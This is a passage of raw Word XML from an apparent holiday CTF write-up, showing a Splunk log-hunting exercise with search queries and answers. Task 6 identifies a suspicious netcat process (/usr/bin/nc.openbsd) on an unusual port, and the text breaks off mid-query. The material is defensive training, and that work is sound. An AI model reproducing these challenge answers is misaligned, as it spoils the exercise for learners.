    <w:p w14:paraId="0AEB53C3" w14:textId="5BA17F4C" w:rsidR="00A76E62" w:rsidRDefault="00A76E62" w:rsidP="00A76E62">
      <w:r>
        <w:t xml:space="preserve">I used </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C60537">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to download the SantaSecretToAWonderfulHolidaySeason.pdf file and downloaded it locally via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C60537">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>scp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7299F1AA" w14:textId="6B0EDFB8" w:rsidR="00A76E62" w:rsidRPr="00A76E62" w:rsidRDefault="00A76E62" w:rsidP="00A76E62">
      <w:r>
        <w:t>As per the document,</w:t>
      </w:r>
      <w:r w:rsidRPr="00A81A30">
        <w:t xml:space="preserve"> the first secret ingredient Santa urges each elf and reindeer to consider for a wonderful holiday season</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>kindness</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C584B3D" w14:textId="77777777" w:rsidR="0053096A" w:rsidRDefault="0053096A" w:rsidP="00466E80"/>
    <w:p w14:paraId="7910DB9F" w14:textId="0031D911" w:rsidR="00853B73" w:rsidRDefault="00853B73" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Objective 9 – Splunk!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F4CDB8" w14:textId="1B1DA6D2" w:rsidR="00853B73" w:rsidRDefault="006439C8">
      <w:r>
        <w:t>To answer this challenge, we need to complete the Splunk exercise and receive a message from Santa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B958839" w14:textId="46B43BCD" w:rsidR="006439C8" w:rsidRPr="00D6316D" w:rsidRDefault="006439C8" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00D6316D">
        <w:t xml:space="preserve">Task 1- Record the most common git-related </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D6316D">
        <w:t>CommandLine</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D6316D">
        <w:t xml:space="preserve"> that </w:t>
      </w:r>
      <w:r w:rsidR="00D6316D" w:rsidRPr="00D6316D">
        <w:t>Eddie</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6316D">
        <w:t xml:space="preserve"> used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1596EFDD" w14:textId="779D497C" w:rsidR="006439C8" w:rsidRDefault="006439C8">
      <w:r w:rsidRPr="006439C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Answer:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C60537">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>git status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68190677" w14:textId="00CD476D" w:rsidR="004F6F1D" w:rsidRPr="004F6F1D" w:rsidRDefault="004F6F1D">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Process: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">use the provided sample search and look for the most used </w:t>
      </w:r>
      <w:r w:rsidRPr="00C60537">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E25B8B" w14:textId="77777777" w:rsidR="004F6F1D" w:rsidRDefault="004F6F1D" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">index=main </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sourcetype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>journald</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> source=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Journald:Microsoft-Windows-Sysmon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/Operational </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EventCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=1 user=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eddie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DECE7F" w14:textId="77777777" w:rsidR="004F6F1D" w:rsidRDefault="004F6F1D" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">| stats count by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CommandLine</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0678208E" w14:textId="7EA4A04B" w:rsidR="006439C8" w:rsidRDefault="004F6F1D" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>| sort - count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23198353" w14:textId="4ADEFE0C" w:rsidR="006439C8" w:rsidRDefault="006439C8" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Task 2 – Determine the remote repositor that he configured as origin for the ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>partnerapi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’ repot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C4EE72" w14:textId="5FC84D2B" w:rsidR="006439C8" w:rsidRDefault="004F6F1D">
      <w:r w:rsidRPr="004F6F1D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Answer:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006439C8" w:rsidRPr="00C60537">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>git@github.com:elfnp3/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006439C8" w:rsidRPr="00C60537">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>partnerapi.git</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="05C5EB6B" w14:textId="5600B2AA" w:rsidR="006439C8" w:rsidRDefault="004F6F1D">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Process</w:t>
      </w:r>
      <w:r>
        <w:t>: Look for commands that contain ‘remote,’ ‘origin,’ and ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>partnerapi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.’ Eddie made a mistake, so find the latest one to determine the correct answer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41165756" w14:textId="77777777" w:rsidR="004F6F1D" w:rsidRDefault="004F6F1D" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">index=main </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sourcetype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>journald</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> source=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Journald:Microsoft-Windows-Sysmon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/Operational </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EventCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=1 user=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eddie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> remote origin </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>partnerapi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="79105ADF" w14:textId="77777777" w:rsidR="00C60537" w:rsidRDefault="00C60537" w:rsidP="004F6F1D"/>
    <w:p w14:paraId="2D0890BD" w14:textId="31D381BA" w:rsidR="006439C8" w:rsidRDefault="006439C8" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Task 3 – Gather the full command line that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Eddit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> used to bring up the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>partnerapi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A24785E" w14:textId="55D6CF06" w:rsidR="006439C8" w:rsidRPr="00C60537" w:rsidRDefault="004F6F1D">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1DCF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Answer:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006439C8" w:rsidRPr="00C60537">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>docker compose up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDF82BA" w14:textId="139DFE03" w:rsidR="006439C8" w:rsidRDefault="004F6F1D">
      <w:r w:rsidRPr="004B1DCF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Process:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Search Eddie’s events for commands containing docker and find the relevant </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CommandLine</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F26679F" w14:textId="202E8AF1" w:rsidR="004F6F1D" w:rsidRDefault="004F6F1D" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r w:rsidRPr="004F6F1D">
        <w:t xml:space="preserve">index=main </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F6F1D">
        <w:t>sourcetype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F6F1D">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F6F1D">
        <w:t>journald</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F6F1D">
        <w:t xml:space="preserve"> source=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F6F1D">
        <w:t>Journald:Microsoft-Windows-Sysmon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F6F1D">
        <w:t xml:space="preserve">/Operational </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F6F1D">
        <w:t>EventCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F6F1D">
        <w:t>=1 user=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F6F1D">
        <w:t>eddie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F6F1D">
        <w:t xml:space="preserve"> docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4D0CDB" w14:textId="40FA16D0" w:rsidR="006439C8" w:rsidRDefault="006439C8" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Task 4 – Determine the URL of the vulnerable GitHub repo that the elves cloned for testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5549FFF4" w14:textId="15D182CB" w:rsidR="006439C8" w:rsidRDefault="004F6F1D">
      <w:r w:rsidRPr="004B1DCF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Answer: </w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidRPr="00600680">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/snoopysecurity/dvws-node</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2202B9AA" w14:textId="7354FA64" w:rsidR="006439C8" w:rsidRDefault="004F6F1D">
      <w:r w:rsidRPr="004B1DCF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Process:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Since we are told these events are coming into Splunk via GitHub webhooks, I wanted to find where they were. I started by searching index=* and looking at the available </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sourcetypes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> which revealed “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>github_json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E16BDF9" w14:textId="73141799" w:rsidR="005B6C57" w:rsidRDefault="005B6C57">
      <w:r>
        <w:t>Searching for “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sourcetype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>github_json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” reveals 27 events. Using the “interesting fields explorer” I found the “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>repository.clone_url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” which contained </w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r w:rsidRPr="00600680">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/elfnp3/dvws-node.git</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r w:rsidRPr="00600680">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/elfnp3/partnerapi.git</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>partnerapi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is not publicly available, but </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dvws</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-node (“Damn Vulnerable Web Services”) is available and sounds in scope for the question. By viewing the repo on the elfnp3 account, we can see it is forked from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>snoopysecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dvws</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-node.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F0024F" w14:textId="1A834A7A" w:rsidR="006439C8" w:rsidRDefault="006439C8" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Task 5 – Determine the name of the library added to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>partnerapi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> project from NPM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CCE37E" w14:textId="3C8B2B1E" w:rsidR="006439C8" w:rsidRDefault="005B6C57">
      <w:r w:rsidRPr="004B1DCF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Answer:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C60537" w:rsidRPr="00C60537">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidR="006439C8" w:rsidRPr="00C60537">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>oliday-utils-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006439C8" w:rsidRPr="00C60537">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="22D2F9CD" w14:textId="105AB4EA" w:rsidR="006439C8" w:rsidRDefault="005B6C57">
      <w:r w:rsidRPr="004B1DCF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Process: </w:t>
      </w:r>
      <w:r w:rsidR="00CC6AA5" w:rsidRPr="004B1DCF">
        <w:t xml:space="preserve">I </w:t>
      </w:r>
      <w:r w:rsidR="00CC6AA5">
        <w:t>checked all of Eddie’s recorded command lines for the presence of “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CC6AA5">
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CC6AA5">
        <w:t xml:space="preserve">” to find what was added. The command </w:t>
      </w:r>
      <w:r w:rsidR="00CC6AA5" w:rsidRPr="00C60537">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>node /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CC6AA5" w:rsidRPr="00C60537">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CC6AA5" w:rsidRPr="00C60537">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CC6AA5" w:rsidRPr="00C60537">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CC6AA5" w:rsidRPr="00C60537">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> install holiday-utils-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CC6AA5" w:rsidRPr="00C60537">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CC6AA5">
        <w:t xml:space="preserve"> was discovered via the search below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DB1CB9" w14:textId="601FF166" w:rsidR="00CC6AA5" w:rsidRDefault="00CC6AA5" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC6AA5">
        <w:t xml:space="preserve">index=main </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC6AA5">
        <w:t>sourcetype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC6AA5">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC6AA5">
        <w:t>journald</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC6AA5">
        <w:t xml:space="preserve"> source=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC6AA5">
        <w:t>Journald:Microsoft-Windows-Sysmon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC6AA5">
        <w:t xml:space="preserve">/Operational </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC6AA5">
        <w:t>EventCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC6AA5">
        <w:t>=1 user=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC6AA5">
        <w:t>eddie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC6AA5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC6AA5">
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC6AA5">
        <w:t xml:space="preserve">  | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC6AA5">
        <w:t>uniq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC6AA5">
        <w:t xml:space="preserve"> | top limit=30 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC6AA5">
        <w:t>CommandLine</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4EE8BE34" w14:textId="0922C367" w:rsidR="006439C8" w:rsidRDefault="006439C8" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Task 6 – Capture the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>full_process</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> field of anything that looks suspicious in the baseline of Eddie’s traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AF018A" w14:textId="2B679160" w:rsidR="006439C8" w:rsidRPr="00C60537" w:rsidRDefault="00CC6AA5">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1DCF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Answer:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006439C8" w:rsidRPr="00C60537">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006439C8" w:rsidRPr="00C60537">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006439C8" w:rsidRPr="00C60537">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006439C8" w:rsidRPr="00C60537">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>nc.openbsd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4173A570" w14:textId="37F71C24" w:rsidR="006439C8" w:rsidRDefault="00CC6AA5">
      <w:r w:rsidRPr="004B1DCF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Process:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A sample search was provided that revealed traffic on 9418 and 16842. Port 9418 has two hits, and upon research, this is commonly associated with </w:t>
      </w:r>
      <w:r w:rsidRPr="00C60537">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:t>. Port 16842 has one hit and is not commonly associated with any known service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFF69A5" w14:textId="24962B9A" w:rsidR="00FA472C" w:rsidRDefault="00FA472C">
      <w:r>
        <w:t xml:space="preserve">The following search reveals the malicious process with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>process_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> value of “</w:t>
      </w:r>
      <w:r w:rsidRPr="00C60537">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C60537">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C60537">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C60537">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>nc.openbsd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD6F4A6" w14:textId="70F29F7B" w:rsidR="00FA472C" w:rsidRDefault="00FA472C" w:rsidP="00C60537">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA472C">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">index=main </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FA472C">
        <w:t>sourcetype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FA472C">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FA472C">
        <w:t>journald</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FA472C">
        <w:t xml:space="preserve"> source=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
